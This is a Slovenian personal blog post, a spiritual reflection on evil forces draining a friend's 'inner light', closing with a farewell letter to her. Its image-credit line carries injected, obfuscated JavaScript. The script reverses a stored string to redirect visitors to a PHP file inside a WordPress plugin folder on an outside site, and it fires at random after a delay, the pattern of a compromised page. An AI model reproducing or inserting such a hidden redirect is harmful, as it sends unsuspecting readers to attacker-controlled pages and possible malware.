Očem ne vidne sile

Verjamete v višjo silo? Verjamete v dobre in v zle sile? Jaz verjamem.

Naj vam povem zgodbo.

Poznam žensko, ki je čudovita oseba. No, nekje globoko v sebi. Ko sem se začela bolj pogovarjati z njo, me je spreletaval srh. Preprosto čutila sem neko prisotnost, ki je konstantno ob njej. To ni bila neka prijetna energija. Ravno nasprotno. Veliko sva se pogovarjali, dala sem ji ogromno nasvetov, a ni poslušala. Tudi sama je večkrat rekla, da me sicer sliši, ampak ji nek ropot ne dovoli slišati.

Za nekaj časa je poniknila, nisem je videla mesec ali dva, potem pa se je spet znašla v družbi. Tokrat je bilo okoli nje čutiti že kar precej negativnih energij in resnično me je zagrabilo. Poskušala sem z vizualizacijo vijolične piramide, a očitno je bilo že prepozno. Resnično me stiska v prsih.

Veste kako je z zli silami? Moč dobijo, ko jim mi dovolimo. Moč nad nami dobivajo počasi, z večanjem dvoma v samega sebe, z ignoriranjem intuicije, z negativnimi mislimi, s strahom. Počasi, a vztrajno iz nas vlečejo žarke naše lastne svetlobe, vse dokler se ta ne spremeni v njih. Na koncu so oni naša energija, naša notranja luč skoraj da izgine in resnično težko se je izvleči.

Žal mi je, a jaz ji ne morem pomagati. Nimam dovolj moči, da bi jo tako preprosto delila še vanjo. Njeni demoni so postali pre močni, da bi še imela možnost, da ji svetujem.

Danes je najin pogovor potekal zgolj enosmerno. Ona je goorila in govorila in tudi, ko sem jo želela ustaviti, ni nehala. Besede stop, stoj, poslušaj, vse je šlo skozi ušesa, samo govorila je. Čutila sem vso črnino, ki se zgrinja nad njo. Čutila sem, da jo razžira nekaj, kar ni njeno. Razžira jo že tako dolgo, da sama sebe sploh ne vidi več. Tako je z zli silami. Enkrat, ko te začnejo napadati, je nujno, da ojačaš svojo notranju luč, drugače bo plamen vedno manjši. In manjši ko bo, težje ga bo prižgati nazaj.

Nikoli ne dovolite, da bi vaš plamen ugasnil. Ko začutite, da nekaj ni v redu, če mislite, da je v bližini nekaj temnega, vizualizirajte, zaščitite se. Širite notranjo luč, ne pustite temi, da vas zaobjame.

Draga prijateljica. Žal mi je, a ni v moji moči, da zate spremenim tvoje življenje. Žal moram poskrbeti za svojo notranjo energijo in se odstraniti. Ne razumi me narobe, bi pomagala, če bi lahko. A to vse kar te obdaja, je močnejše od mene. Ne bom pustila, da se naseli v mojo bližino. Tebi pa pošiljam moč vesolja, višjo silo, da ti pomaga odgnati stran vse zle. Da bo, čeprav za trenutek, na rahlo zasijal tvoj plamen, to bo tvoja priložnost. Zagrabi jo prosim, drži se je. Neguj ta plamen in s pomočjo vesolja te bo zapustila tema.

Srečno.

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/haunted?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

One Comment